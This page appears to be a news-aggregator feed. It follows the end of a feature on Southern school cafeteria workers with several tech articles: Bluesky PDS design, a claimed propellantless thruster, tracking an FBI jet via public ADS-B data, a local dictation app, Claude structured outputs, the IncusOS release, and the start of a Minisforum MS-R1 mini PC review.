Dillard says the federal funding cuts will hurt local farmers in Alabama, but her state offers rebates when she serves Alabama-grown foods. “They direct us and help me find the farmers that have the ability to grow enough for our district,” she says. “So I’m very lucky in that aspect. As soon as we find something new or new farmers willing to grow for us, we jump on that.”

Likewise, in Tennessee, Seiber-Garland works through a different grant specifically for elementary students to provide snacks of fresh fruit and vegetables paired with nutritional education. “The kids are the joy for sure. Watching them and their excitement when there’s something they really like,” she says, of offering students new tastes as well as standbys like peaches, grapes, berries, pepper strips, and carrots. A student’s mother came up to her at the cafeteria and said, “You’re the reason my daughter likes raspberries.”

In 2022, California became the first of a half dozen or so states to offer free school meals to all students, regardless of family income. Dillard supports free meals for all students with an emphatic, “Yes, yes, yes!” Food should not be based on income, she says: “It should be part of the school day. Your transportation is of no charge to students. School books are no charge to students. School lunch should be of no charge to students. … It’s just the right thing to do.”

Still, most schools must provide a mix of fee-based and subsidized free and reduced-price meals. Some communities with high percentages of families on SNAP and enrolled in Medicaid automatically qualify for the USDA’s Community Eligibility Provision, which authorizes free meals for all students in the district. But, as the “Big Beautiful Bill” slashes both SNAP and Medicaid, it will surely reverberate through school lunchrooms too. “It’s going to be a huge burden for a lot of families,” says Weaver-Hightower. “The number of problems I think [free lunches] would solve is a really long list. There’s paperwork, of course. And there’s the shame and stigma that some kids feel. Why would we do that to little 5-year-olds?”

Janet Roach “The kids — that’s what I love about the job.” (age 63; 9 years in the cafeteria; from Trenton)

Through all of the policy changes, the cafeteria has remained the “heart of our schools,” according to acclaimed chef Alice Waters. In 1995 she founded the Edible Schoolyard Project, an international nonprofit dedicated to promoting organic school gardens, kitchens, and cafeterias. Waters’ new book, A School Food Revolution (October 2025) celebrates this beating heart of public education.

Dan Giusti, formerly head chef at world-renowned Noma, is another prominent advocate for school lunches. He left his prestigious role in 2015 to create Brigaid, a company now working with 40 school districts in eight states along with other institutions such as senior centers and prisons.

His team has adopted the pragmatic approach long espoused by the professionals in those settings. “We don’t say, This is the food you should serve , or, You shouldn’t serve this food ,” he explains. “It is their program and it is their community. Who are we to come from the outside to tell them otherwise? So we come in and ask, What are you trying to achieve with your program?

Giusti loves the puzzle — the dynamics and balance of nutrition and taste preference. “I was talking with a food service director, and she uses the statistic that roughly 70 percent of the calories students eat in her district come from the food in the schools. So you have a real responsibility to make sure that food is nutritious. But at the same point you also need to make sure kids want to eat it. … Kids need to eat. Period.”

Giusti stresses that policies need to be backed up with resources. “It’s amazing to talk about removing processed foods, cooking more from scratch. I have a business based off of that,” he says. “It’s also really hard to do. If we’re going to say to School District XYZ, You can’t use these things anymore , then I hope we’re also going to give them money to buy more equipment and train their staff.”

Furthermore, edicts need to take into account the people who have to implement them, Giusti stresses. “Folks who work in the kitchens get caught in the mix,” he says. “You can feel it on them. They’re just waiting for the next initiative. They’ve maybe been working in these schools for 20, 30 years, and they’ve seen so many initiatives come and go, come and go. They’ve seen people come and go. Superintendents come and go. But they’re still there. Doing this work every day.”

Cherie Kelly (age 48; 9 years in the cafeteria; from Ottawa, Illinois)

Similar to my grandmother, Hope North in Murfreesboro, Tennessee, started work at the cafeteria when her son entered school. She’s been in food service ever since, about 27 years. Long enough to see her grandson attend Murfreesboro City Schools, too.

On a recent summer day, she climbed onto a brightly painted old school bus with the words CHOW BUS across its front. Inside, the seats had been reconfigured into booths with tables. About 50 meals sat in cooler bags: penne pasta with tomato-meat sauce, a side of carrots, fruit cups, and milk. The bus was headed for Chariot Pointe Apartments, the first stop of about five that day.

“We meet people where they are,” says Tori Carr, a school employee who was driving a van that followed the bus, which had been converted into a sort of free book store. Its shelves also carry cleaning supplies, pantry items, and simple toys like glow sticks and coloring pages.

North’s cousin Keith Sneed drives the Chow Bus as well as regular bus routes during the school year. The two make a good team — tough and tender. They run their route every day in the summer heat, bus windows down. North keeps tabs on her people at each stop. She knows their stories and worries. And if they don’t show up for a few days, she’ll be on the case.

They’d hardly parked at their first location, when a young man in a yellow T-shirt approached the bus. Sneed poked his head out the window. “Man, go get a book!” he said. “You ain’t read a book all summer.” The boy couldn’t help but oblige. Book in hand, he got a fist bump from Sneed as he climbed up the steps for a meal.

“It’s not just about the food,” Sneed explained later. “All they want is for you to listen to them.” But, of course, food is important, too. Not all schools can serve summer meals, which leaves many students at risk. And while this school used to have three Chow buses, funded by a USDA grant, they’re now down to one. “If we lose this bus,” Sneed says, “people will be hungry.”

Cathy Hill ( age 62; 2 years in the cafeteria; from Humboldt, Tennessee, but moved to Trenton)

Carolyn White “The kids keep me active.” (age 64; 4 years in the cafeteria; came here from California)

Today, my grandmother’s town of Blue Ridge is surrounded by million-dollar vacation homes, its downtown sidewalks lined with art galleries and outfitters selling $6,000 bamboo fly rods. The economic disparity between visitors and full-time residents is vast. Fannin County schools qualify for the Community Eligibility Provision, which allows free meals for all — at least for now.

Martha Williams, who works as director of nutrition and wellness in Fannin County School District, grew up here and originally returned to teach math. But a cafeteria lunch lady inspired Williams to work in school nutrition when she pulled the teacher aside and pointed out a student who seemed disheveled and kept wearing the same clothes. Williams recognized the insights that can be gleaned from the serving line and how the work goes beyond keeping kids fed to providing stability, routine, and community care.

Williams points to another inspiration, GiGi Thomas, 63, who has worked in school food service for more than two decades. These days one of her duties is serving cookies, kept in an ancient warmer that “probably came over on the Mayflower,” Thomas says with a laugh. She hands students freshly baked cookies on napkins. “I see these kids every day,” she says. Some of them like chocolate chip cookies, others prefer sugar cookies. “It tickles them to death that I kind of remember what they get.”

In 2023, her cookies were featured in the high school seniors’ graduation video. “If you don’t have the cookies, those kids are devastated,” Thomas says. “That’s all you wanna do is take care of the kids.”

Over in West Tennessee, Seiber-Garland says she sometimes feels like she has 1,400 kids of her own. If no one shows up for a student on grandparents’ day, she fills in. And she loves running into students outside school, where they’re excited to say, “There’s my lunch lady!” Alumni sometimes share photos of their kids. “They’re so special. Every one of them.”

Over her 22 years in the business, Seiber-Garland has served her mother’s recipe for poppyseed chicken as well as old favorites like chicken tetrazzini and spaghetti. “I’ve always said, I want this to be their cafe . I can’t control what goes on at night. But for two-thirds or three-fourths of the day, I can. And I want them to be fed and happy, well, and blessed. They bless me.”

She tells of a student who kept trying to save her meal to carry home, because she didn’t have anything to eat there. Seiber-Garland and her staff found a way to provide her with a second meal for the evening. “I also had a parent come tell me to not let her child eat. And I’m like, No ma’am. If she asks to eat in my line, I’m gonna feed her.

Seiber-Garland says there are people who donate every year to help pay off lunch balances that have remained unpaid. Recently, she created a “share table” on a red cart with a donated Yeti cooler that helps teach kids about reducing food waste. It’s where students can leave unopened milks or whole food that they don’t want for their classmates to enjoy. She’s also been known to cover lunches out of her own pocket, and her staff has taken up collections, too. “They’re gonna be fed,” she says. “We’ll find a way.”

I hear in those words the resourcefulness and care of my own grandmother and a guiding phrase she taught my father in standing up for what you believe.

As Granny would say, “You take your part.”  ◊

Jennifer Justus is a writer based in Atlanta, Georgia, and St. Petersburg, Florida. She is an editor at Wildsam and author of Nashville Eats (Abrams). Her work has been published in two editions of Cornbread Nation: The Best of Southern Food Writing, a publication of the Southern Foodways Alliance, and she has received national awards from the Society of Features Journalism, Society of Professional Journalists, and the Association of Food Journalists. Jennifer graduated from the University of Tennessee followed by Boston University where she created her own food writing curriculum with courses in journalism and the masters program in gastronomy, which was founded by Julia Child and Jacques Pepin, and focuses on the cultural study of food. She worked for six years as food culture reporter and features writer at The Tennessean newspaper before embarking on a freelance career that led to work in TIME, Rolling Stone Country, Southern Living, Garden & Gun and more. Jennifer is co-founder of the recipe storytelling project Dirty Pages . The project's first exhibit lives in the permanent collection of the Southern Food & Beverage Museum in New Orleans. She was born in the mountains of Blairsville, Georgia near the start of the Appalachian Trail, which might explain her love for soup beans and cornbread.

Houston Cofield is a photographer based in Memphis, Tennessee. His work explores mythology, fiction, and folklore that embody the American South.

Top Photo: Peggy Davis “I’ve been working here off and on since 1975 — and still here.” (age 69; 50 years in the cafeteria; from Trenton, Tennessee)

More from The Bitter Southerner

Show HN: Epstein Files Organized and Searchable

Hacker News
searchepsteinfiles.com
2025-11-14 19:50:16
Comments...

The politics of purely client-side apps

Lobsters
pfrazee.leaflet.pub
2025-11-14 19:49:42
Comments...
Original Article

You make a post on Bluesky. How does it happen?

Option 1:

  • Your client calls putRecord on the user's PDS

  • 200 OK, the record was created

  • The record goes through the relay to the Bluesky server

  • Bluesky servers index the new record

  • Tada

Option 2:

  • Your client calls createPost on the Bluesky servers

  • The Bluesky servers call putRecord on the user's PDS

  • The Bluesky servers update their indexes

  • 200 OK, the record was created

  • (The record shows up again via the relay and can be reindexed if needed)

  • Tada

Both of these are now possible in the Atmosphere, but which of these options is the "good one"? It turns out, that's a pretty nuanced question.

Option 1 - PDS proxies all traffic

Option 1 is the "PDS proxies all traffic" philosophy. In this model, the client logs into the PDS and then sends all traffic to the Atmosphere by proxying through the PDS.

This has some interesting consequences:

1. The client mutates records by directly writing them to the PDS

2. The PDS is able to intercept and modify traffic to apps

3. There's no opportunity for server-side computation within the lifetime of a transaction

Points 1 & 2 have positive political implications. The ability to write directly to a PDS means that third-party "pure clients" (no backend of their own) have a lot of freedom in how they operate. Then the ability to intercept and modify traffic means that a PDS can make decisions on behalf of their users which might be contrary to the application's decisions. These are both good balances against the power of an app.

Point 3 just sucks though. What's not obvious about Option 1's flow is that the time between "200 OK" and "Bluesky servers index the record" is indeterminate. The 200 OK ends the transaction from the client's perspective, so now the client is going to struggle to show the user the actions they just took.

Right now, the PDS takes advantage of traffic interception to modify getPostThread and inject the user's recent posts. That does work, but it means the PDS has Bluesky business logic baked in. Not only is that a conceptual violation of the PDS -- which is supposed to be generic -- but it's an option that's not available to every app.

Option 2 - App server speaks to PDS

Option 2 is the "App server speaks to PDS" philosophy. In this model, the client logs into the app, which in turn logs into the PDS, and then the client speaks entirely to the app. The app then talks to the PDS directly to modify requests.

This basically removes all 3 of the consequences in Option 1. There's no problem of ensuring actions are immediately visible to users after a transaction, but now the client isn't in communication with the PDS so the political power of the PDS is reduced.

Which should we do here?

Ultimately, the Atmosphere community is going to need to align on one of these two methods. The Bluesky app still uses Option 1, but now that OAuth is here the guidance we've been giving is Option 2. Is that the right call?

I'm really torn on this. I'm going to just dump an assortment of thoughts, some of which are contradictory.

  • Purely client-side apps are a good thing

  • It sucks when you're building purely client-side and can't do exactly what you want to do, or can't make your customizations perform well

  • Services like microcosm are pretty great for enabling those customizations

  • Option 2 is much more intuitive to me than Option 1

  • Option 2 will always perform better

  • It's currently too expensive to build full network app servers in the Atmosphere

  • The ability for the PDS to intercept and modify traffic is really good

  • The role of the PDS within the political economy of the atmosphere is still not totally clear, but acting as some kind of counterbalance to applications is a really promising idea if we could get more clarity on how that will work

My gut says we should be leaning towards Option 2 because it's clearer and because it enables app developers to do more. To handle the costs I'm inclined to think that Bluesky's servers should be available almost like a cloud service, which would drive down costs a lot and generally increase the ability for third-party apps to implement new or different behaviors. This would essentially transfer the political power of the PDS (ie to intercept and modify traffic) over to the third-party applications.

Just some thoughts.

An Italian Company Builds the First Known Propellantless Space-Propulsion System

Hacker News
www.satcom.digital
2025-11-14 19:43:15
Comments...
Original Article

Genergo, an Italian deep-tech company based in Como, comes out of stealth and unveils an innovative electromagnetic space-propulsion system that uses no propellant, successfully flight-tested and validated across three space missions and protected by a portfolio of granted international patents.

Operational satellites equipped with propulsion carry propellant on board to perform orbital maneuvers, maintain position, and, in some cases, execute end-of-life atmospheric re-entry. Propellant takes up volume and adds mass - often further increased by the hardware required to manage it (pressurized tanks, control valves, feed lines) - introduces operational risks (leaks, explosions), and is, by definition, a finite resource. Once depleted, the spacecraft is no longer maneuverable and the mission ends.

Genergo’s system generates thrust without using any propellant and without expelling reaction mass, by directly converting electrical energy into thrust through controlled electromagnetic impulses. To the company’s knowledge, it is the first space-propulsion system worldwide capable of operating without propellant, flight-tested and validated on orbit, and it represents a clear discontinuity from current standards. By design, the technology is scalable and operates with a modest power requirement.

The system also exhibits a highly sustainable profile: it uses no hazardous or toxic materials, requires no pressurized components to be stored on board, and introduces no risk of contaminating the space environment—either during operations or upon atmospheric re-entry.

After passing, on the first attempt and within a few months, all mission launch-qualification tests to the industry’s most stringent standards, the technology accumulated more than 700 hours of on-orbit operation across three missions launched between 2022 and 2023. The missions—still operational—were launched on SpaceX Falcon 9 as part of the Transporter rideshare campaigns (Transporter-5, -6 and -9) and hosted on D-Orbit’s ION Satellite Carrier spacecraft (platforms designed by the Italian company based in Fino Mornasco, Como, also used to carry and qualify emerging technologies in space). Over the past two years, multiple on-orbit activation cycles have continued alongside data analysis and characterization activities; additional tests are planned to further characterize the technology.

The campaigns confirmed system functionality in real space conditions, bringing the technology to a maturity level equivalent to TRL 7–8 (Technology Readiness Level). As additional confirmation of the results, several long-duration tests were conducted in which it was observed, objectively and repeatedly, that motor activation produced a measurable acceleration or deceleration of the host spacecraft.

The performance achieved to date by the flight-tested prototypes is already aligned with market requirements for specific mission profiles.

Several Italian organizations contributed to the project, including:

  • The Department of Electronics, Information and Bioengineering (DEIB) at Politecnico di Milano, for laboratory bench measurements;

  • The Department of Aerospace Science and Technology (DAER) at Politecnico di Milano, which developed the spacecraft dynamics model for the on-orbit analysis of the first mission and produced the motor electromagnetic-emissions report required during preliminary qualification for on-orbit acceptance;

  • An independent company specializing in high-technology solutions, which validated the in-orbit results using a broad set of methodological approaches, ensuring the robustness and repeatability of the observed performance.

Genergo’s technology opens new perspectives for space missions.

Inaddition to further on-orbit campaigns planned forcontinued development, the first commercial application will be controlled deorbit—namely, lowering a satellite’s orbit to guide atmospheric re-entry and ensure burn-up at the end of the mission.

How to Track Kash Patel’s Jet

Intercept
theintercept.com
2025-11-14 19:29:25
Flight-tracking is a powerful tool for government transparency. We’ll show you how to do it. The post How to Track Kash Patel’s Jet appeared first on The Intercept....
Original Article

FBI Director Kash Patel enjoys access to a litany of professional perks, among them use of a Gulfstream G550 jet, a 15-passenger luxury aircraft owned by the Department of Justice that he has reportedly taken to visit his aspiring country musician girlfriend. Responding to growing outrage about his personal use of the government jet, Patel has insisted those who track his flights are dangerous and cowardly.

Unfortunately for Patel, tracking flights is legal, easy, and an important tool of government transparency.

The location of aircraft within and around the United States is public because the law requires it to be: The Federal Aviation Administration mandates that aircraft must be trackable for safety reasons, namely, to prevent them from crashing into each other all the time. Aircraft, whether privately owned or operating for a major carrier, from a small prop plane to a jumbo jet, are generally required by law to carry a radio transmitter, called a transponder, that continuously broadcasts its GPS coordinates and other information, such as altitude and ground speed. Thanks to what’s known as the Automatic Dependent Surveillance–Broadcast, or ADS-B, unencrypted transponder signals are received by other planes in the sky and anyone with a compatible antenna on the ground. According to the FAA, “ADS-B improves safety and efficiency in the air and on runways, reduces costs, and lessens harmful effects on the environment.”

Accessing these broadcast coordinates from the ground is only slightly more complex than tuning in to a local radio station. Entire online communities of aircraft hobbyists, researchers, journalists, and others make use of this open source data to chart the travel of foreign dignitaries, military movements, corporate executive trips, and, now, the director of the FBI.

As vessels of the rich and powerful, the ability to track private flights provides undeniable value to the public : It’s been used to monitor Russian oligarchs, map the CIA’s foreign torture program, and calculate Taylor Swift’s carbon footprint. That this tracking is entirely legal hasn’t stopped the owners of private jets from objecting to the practice. Elon Musk notoriously threatened legal action and banned users from his “free speech” platform X for revealing the movements of his private jet, a practice he described as tantamount to sharing “assassination coordinates.” The use of luxury planes by public servants is a perennial political issue too. In January 2023, two years before he was named as his successor, Patel blasted FBI Director Christopher Wray’s use of the “tax payer funded private jet” based on exactly this same public tracking data.

Patel’s attitude has changed now that he enjoys free use of that jet. In October, Patel’s jet was monitored flying to to State College Regional Airport in Pennsylvania, a brief drive to an arena on the Penn State campus where he and girlfriend Alexis Wilkins were photographed at a Real American Freestyle pro-wrestling event at which Wilkins had performed a song. Flight data then showed the jet headed to Nashville later that evening after the wrestling match, where Wilkins lives, according to her personal website. After facing criticism for using a government plane to see his girlfriend sing the national anthem at a local wrestling event, Patel quickly lashed out in an X post , attacking public scrutiny of the flights and claiming the use of such data is “cowardly and jeopardizes our safety.”

As FBI director, Patel is required by federal policy to use the jet for personal trips, but Patel is also required to reimburse the DOJ for personal flights. The FBI did not respond to a request for comment or questions posed by The Intercept, including whether Patel has reimbursed the DOJ for personal jet use.

Plane-tracking websites usually draw data from several sources, with many relying heavily on information straight from the FAA. Jet owners can ask the FAA to exclude their transponder data from public trackers, a request many commercial services will honor. For this reason, many plane-watching enthusiasts favor ADS-B Exchange , a free website that crowdsources transponder data collected by thousands of volunteers on the ground and pools it for public consumption. Because it uses crowdsourcing instead of just official FAA data, ADS-B Exchange shows every flight its connected antennae pick up — even if the aircraft’s owners have requested to be delisted. (Although it’s the most comprehensive, certain flights, like military planes that broadcast encrypted coordinates, can remain undetected even by ADS-B Exchange.)

Software engineer and plane tracking enthusiast John Wiseman recommended ADS-B Exchange and Airplanes.live , another service. “They don’t use FAA data, so they’re not bound by FAA rules on what data can be distributed. They also don’t take requests from aircraft owners to anonymize flights,” Wiseman explained.

ADS-B Exchange, with its sprawling, comprehensive map of nearly every plane in the sky, can be overwhelming at first. But tracking Patel’s jet (or any aircraft) is simple. Last year Congress made it more difficult for the public to connect private jets to their owners; establishing the ownership of non-governmental planes can sometimes require serious digging. But the existence of the FBI jet is a matter of public record, and its registration information is publicly available from the FAA’s website. Each plane in the FAA’s system has a unique number: Patel’s is N708JH. The FAA website confirms that N708JH is owned by an entity at 935 Pennsylvania Avenue in Washington, DC, the address of FBI headquarters. Searching ADS-B Exchange for N708JH will immediately pull up the plane’s current position, if in the air, as well as historical records of past flights. At the time of publication, the jet was last clocked landing at a municipal airport outside of Washington.

Pressing the “Play” button on ADS-B Exchange’s interface will animate a selected historical flight route. It’s possible to dive deeper into the data using filters; appending “?mil=1” at the end of the site’s URL will show only available military flights, for example.

Anyone can search the FAA website to find other planes of interest; a search for the word “department” reveals dozens of aircraft registered to various federal offices. The website Planespotters.net collects runway photography from around the world, including of N708JH , and can be used to find other aircraft belonging to the Justice Department or other government entities. With a tail number in hand plucked either from FAA or another source, it’s not hard to figure out a plane’s location and travel history.

There are limits to what flight data can reveal. Nothing about the purpose of a flight is disclosed, nor are its passengers. But in conjunction with other open-source information — Wilkins’s Instagram account placed Patel alongside her at Real American Freestyle — it can help fill in the gaps.

The Wall Street Journal recently used flight data from the plane-tracking service FlightRadar24 in a recent report that showed not only had the FBI jet traveled to Nashville coinciding with Wilkins’s wrestling performance, but shortly thereafter also ferried Patel to the Boondoggle Ranch, a Texas hunting resort.

But if the U.S. government, particularly the military, wants to keep a flight hidden badly enough, it will. As the Pentagon launched a string of airstrikes against Iran in June, flight-tracking enthusiasts across the internet latched onto an Air Force refueling plane heading west, toward a base that houses B-2 bombers. Meanwhile, the actual B-2 bombers involved in the strike — which didn’t appear on any tracking portals — were flying in the opposite direction.

Savvy flight-watchers can sometimes get lucky, though, Wiseman explained. ADS-B Exchange also picks up planes broadcasting TIS-B signals, another transponder system. “Many law enforcement and military aircraft only show up on TIS-B. The icons are distinctive, and the [ID codes] are prefixed with ‘~’,” he said. “Sometimes people think those are drones, or fighter jets. They’re almost always just police aircraft, but once in a while, rarely, they are drones or fighter jets.”

Experts suggest new plane trackers chat with other enthusiasts who can share helpful knowledge and context. Discords or other online communities of plane-watchers can help newcomers avoid common errors, like mistaking what might be a typical flight pattern for something unusual or suspect.

Despite Patel’s characterization of plane scrutiny as the work of “clickbait haters” and “uninformed internet anarchists,” plane trackers who spoke to The Intercept all firmly defended the public’s right to know. “Public officials are acting in our name, so we should actively be making sure they’re doing what they claim to be doing and doing so ethically,” Canadian researcher Steffan Watkins, an avid tracker of military and other governmental flights, told The Intercept.

“There’s a strong public interest in knowing how aircraft are being used, and keeping government organizations accountable.”

“There’s a strong public interest in knowing how aircraft are being used, and keeping government organizations accountable,” said Wiseman. “It’s good for the public, journalists, and researchers to be able to see how these aircraft are being used, in detail, and how public funds are being spent, in detail. Transparency also deters misuse.”

Wiseman recounted how flight tracking techniques have been used to reveal governmental aerial surveillance of protests : “If it hadn’t been for the persistence of a bunch of nerds obsessed with planes it’s possible the public would have never known.”

Even the DOJ itself has been a fan of ADS-B tracking. In 2016, Assistant Attorney General Leslie Caldwell said her office had used Dictator Alert, a plane-tracking website that uses ADS-B Exchange data, to aid in criminal seizure investigations.

Watkins rejected concerns — largely by the jet-owning class — that using ADS-B data presents a security risk: “Adversaries, like China, Russia, Iran, etc. already have better ways larger numbers of intelligence professionals tracking these movements, so the public should be as informed as public sources allow.” Wiseman agreed, saying, “There seems to be almost no risk to legitimate operations by making this information public, based on that fact that over the past years that ADS-B has been in wide use and registration information has been generally public we’ve seen very few if any incidents.”

Show HN: Chirp – Local Windows dictation with ParakeetV3 no executable required

Hacker News
github.com
2025-11-14 19:07:45
Comments...
Original Article

Chirp

Chirp is a Windows dictation app that runs fully locally using ParakeetV3 STT and is managed end-to-end with uv . Chirp does not require the ability to run executable files (like .exe) on Windows. It was designed so that if you're allowed to run Python on your machine, you can run Chirp.

Why ParakeetV3?

ParakeetV3 has indistinguishable accuracy from Whisper-large-V3 (multilingual WER 4.91 vs 5.05) but is 17x faster and only requires a CPU while Whisper models of comparable accuracy require GPU's.

https://huggingface.co/spaces/hf-audio/open_asr_leaderboard

Goals

  • Provide fast, reliable, local-first dictation on Windows.
  • GPU not needed or wanted.
  • Corporate environment friendly - NO NEW EXECUTABLES (.exe) REQUIRED. If you can run python you can run chirp.

Features

  • Local STT via Parakeet TDT 0.6B v3 with optional int8 quantization.
  • Global hotkey to toggle capture, clipboard paste injection, and configurable word overrides.
  • Optional audio feedback cues and style prompting for post-processed text.
  • CPU support by default with optional GPU providers when available.

Architecture

  • src/chirp/main.py — CLI entrypoint and application loop.
  • src/chirp/config_manager.py — configuration loading and Windows-specific paths.
  • src/chirp/parakeet_manager.py — Parakeet backend integration and provider handling.
  • src/chirp/setup.py — one-time setup routine that prepares local model assets.

Setup (Windows, uv-only)

  1. Clone the repository and enter it:
    git clone https://github.com/Whamp/chirp.git
    cd chirp
    uv run python -m chirp.setup #one-time setup and model downloading

Running

  • Daily usage (preferred, works even on systems that block .exe launchers):
    uv run python -m chirp.main
  • Verbose/debug logging:
    uv run python -m chirp.main -- --verbose
  • CLI help and options:
    uv run python -m chirp.main -- --help

Customization

  • The config.toml has sensible defaults but is fully customizable.
  • config.toml also allows for word_overrides ie. parra keet -> parakeet config.toml:
primary_shortcut = "ctrl+shift"                 # Hotkey that toggles recording; any combination supported by the `keyboard` library works (e.g. "ctrl+shift+space").
stt_backend = "parakeet"                        # Only "parakeet" is bundled today, but keeping this key lets us add more backends later if needed.
parakeet_model = "nemo-parakeet-tdt-0.6b-v3"    # Deployed ONNX bundle name; keep as-is unless new models are added.
parakeet_quantization = ""                      # Set to "int8" to download/use the quantized model variant; leave blank for default fp16.
onnx_providers = "cpu"                          # ONNX runtime provider string (comma- or pipe-separated if your build supports multiple providers, e.g. "cuda" or "cpu|dml").
threads = 0                                     # 0 (or empty) lets ONNX decide; set a positive integer to pin thread usage.
language = "en"                                 # Optional ISO language code; leave blank to let Parakeet auto-detect.
post_processing = ""                            # Text prompt for the StyleGuide; see docs/post_processing_style_guide.md (e.g. "sentence case", "prepend: >>", "append: — dictated with Chirp").
paste_mode = "ctrl"                             # Non-Windows platforms honor this: "ctrl" -> Ctrl+V, "ctrl+shift" -> Ctrl+Shift+V. Windows types text directly today.
clipboard_behavior = true                       # Keeps clipboard history clean when true by clearing it after `clipboard_clear_delay` seconds.
clipboard_clear_delay = 0.75                    # Seconds to wait before clearing the clipboard (only if `clipboard_behavior` is true).
audio_feedback = true                           # Enables start/stop chime playback.
start_sound_path = ""                           # Leave blank to use bundled asset; default: src/chirp/assets/ping-up.wav
stop_sound_path = ""                            # Leave blank to use bundled asset; default: src/chirp/assets/ping-down.wav

# Word overrides map spoken tokens (case-insensitive) to replacement text.
[word_overrides]
parrakeat = "parakeet"
"parra keat" = "parakeet"  

Removal

  • Delete the cloned chirp directory.
  • That's it.

Acknowledgments

Structured Outputs on the Claude Developer Platform (API)

Hacker News
www.claude.com
2025-11-14 19:04:23
Comments...
Original Article

Learn how teams at NBIM, Brex, and more build reliable AI agents with Claude on AWS Bedrock.

Learn how teams at NBIM, Brex, and more build reliable AI agents with Claude on AWS Bedrock.

Learn how teams at NBIM, Brex, and more build reliable AI agents with Claude on AWS Bedrock.

Guarantee responses match your JSON schemas and tool definitions with structured outputs.

  • Product

    Claude Developer Platform

  • Share

    Copy link

    https://claude.com/blog/structured-outputs-on-the-claude-developer-platform

The Claude Developer Platform now supports structured outputs for Claude Sonnet 4.5 and Opus 4.1. Available in public beta, this feature ensures API responses always match your specified JSON schemas or tool definitions.

With structured outputs, developers can eliminate schema-related parsing errors and failed tool calls by ensuring that Claude's responses conform to a defined schema—whether you're extracting data from images, orchestrating agents, or integrating with external APIs.

Building reliable applications

For developers building applications and agents in production, a single error in data formatting can cause cascading failures. Structured outputs solves this by guaranteeing your response matches the exact structure you define, without any impact to model performance. This makes Claude dependable for applications and agents where accuracy is critical, including:

  • Data extraction when downstream systems rely on error-free, consistent formats.
  • Multi-agent architectures where consistent communication between agents is critical for a performant, stable experience.
  • Complex search tools where multiple search fields must be filled in accurately and conform to specific patterns.

Structured outputs can be used two ways: with JSON or tools. When used with JSON, you provide your schema definition in the API request. For tools, you define your tool specifications, and Claude's output conforms to those tool definitions automatically.

The end result is a reliable output, reduced retries, and a simplified codebase that no longer needs failover logic or complex error handling.

Customer Spotlight: OpenRouter

OpenRouter provides 4M+ developers access to all major AI models through a single, unified interface.

"Structured outputs have become a really valuable part of the agentic AI stack. Agents constantly ingest and produce structured data, so Anthropic’s structured outputs close a real gap for developers. Agent workflows run reliably, every time, and teams can focus on their customers rather than debugging tool calls,” said Chris Clark, COO, OpenRouter.

Getting started

Structured outputs is now available in public beta for Sonnet 4.5 and Opus 4.1 on the Claude Developer Platform, with support for Haiku 4.5 coming soon. Explore our documentation for supported JSON schema types, implementation examples, and best practices.

Get the developer newsletter

Product updates, how-tos, community spotlights, and more. Delivered monthly to your inbox.

Please provide your email address if you'd like to receive our monthly developer newsletter. You can unsubscribe at any time.

Thank you! You’re subscribed.

Sorry, there was a problem with your submission, please try again later.

Transform how your organization operates with Claude

Get the developer newsletter

Product updates, how-tos, community spotlights, and more. Delivered monthly to your inbox.

Please provide your email address if you'd like to receive our monthly developer newsletter. You can unsubscribe at any time.

Thank you! You’re subscribed.

Sorry, there was a problem with your submission, please try again later.

Announcing IncusOS

Lobsters
discuss.linuxcontainers.org
2025-11-14 19:03:18
Comments...
Original Article

Introduction

After a bit over a year of hard work, the development team is very excited to announce general availability of IncusOS!

IncusOS is a modern immutable OS image that’s specifically designed to run Incus.
It provides atomic updates through an A/B update mechanism using distinct partitions and it enforces boot security through UEFI Secure Boot and a TPM 2.0 module.

Under the hood, it’s built on a minimal Debian 13 base, using the Zabbly builds of both the Linux kernel, ZFS and Incus, providing the latest stable versions of all of those. We rely a lot on the systemd tooling to handle image builds (mkosi), application installation (sysext), system updates (sysupdate) and a variety of other things from network configuration to partitioning.

It’s a very locked down environment where no local or remote shell access is provided. The entire system is configured and operated through the Incus API, using either TLS client certificate authentication or external OIDC authentication.

An introduction video can be found here :

Website: Linux Containers - IncusOS - Introduction
Documentation: IncusOS documentation
Github: GitHub - lxc/incus-os: Immutable Linux OS to run Incus

How to try it

IncusOS is designed to run on bare metal, mostly on modern servers from the past 5 years or so. But it can also run on some older hardware so long as they meet our minimum requirements or it can be run in a virtual machine, mostly for testing purposes.

We’ve published detailed instructions for a variety of environments here:

Downloading IncusOS is most easily done through our online image customizer which allows for selecting the desired image and behavior as well as providing the public certificate to be trusted upon installation.

A custom image is required as there is no interactive installation process at all. Everything needed for installation and initial startup is defined through built-in configuration (referred to as seed ) which gets applied to the system on first boot.

Additionally, all Incus online demo sessions have been using IncusOS for the past 3-4 months now.

What’s next

Now that IncusOS is considered stable, we will be producing at least one stable build a week to pick up the latest Linux kernel bugfix release and any other Incus or Debian bug fixes.

We also still have quite a few features and improvements to make to IncusOS, this ranges from adding a few more configuration options to adding support for Linstor (alongside the existing Ceph support) and more system services like Netbird (alongside our existing Tailscale support).

On the more exciting front, we’re working on a couple of changes to both IncusOS and the Incus UI to allow full deployment and management entirely through the web interface, also eliminating the need for TLS client certificate authentication:

Once that’s all sorted out, we’ll focus on supporting an automated deployment of the full Incus stack including all recommended support services (authentication, authorization, monitoring, distributed networking, distributed storage, …).

How can you help

At this point, we’d love for as many as possible to give IncusOS a try, both in a virtualized test environment and on any spare physical hardware you may have.

Just keep the Secure Boot and TPM 2.0 requirements in mind. A general rule of thumb is that any piece of hardware capable of running Windows 11 will also be capable of running IncusOS.

We have opened a new forum category for questions and discussions around IncusOS:

Bugs and feature requests can be filed directly on Github:

Minisforum Stuffs Entire Arm Homelab in the MS-R1

Hacker News
www.jeffgeerling.com
2025-11-14 18:42:55
Comments...
Original Article

Minisforum MS-R1 front

The Minisforum MS-R1 uses the same Cix CD8180 Arm SoC as the Orion O6 I reviewed earlier this year . But everything else about this thing is different.

What this thing should be, is a box that runs Linux and can compete with at least an Apple M1 Mac mini, or a mid-range Mini PC. But what we got ... is something different.

Video

Hate reading? I also published a video on the MS-R1 on my YouTube channel. Watch it here, or scroll on past.

Hardware overview

Let's get started with the hardware. At first glance, it looks great!

Minisforum MS-R1 open chassis rear ports

You have a 12 core Arm CPU with a Mali G720 iGPU. There's a full-size PCIe slot, NVMe storage, WiFi 6E, and a ton of ports on the front and back.

You have a grand total of 9 USB ports, with 2 of them Type C with DisplayPort 1.4.

There's HDMI, dual 10 Gbps NICs (Realtek RTL8127), and even an old fashioned audio combo jack, so you can plug in a headset.

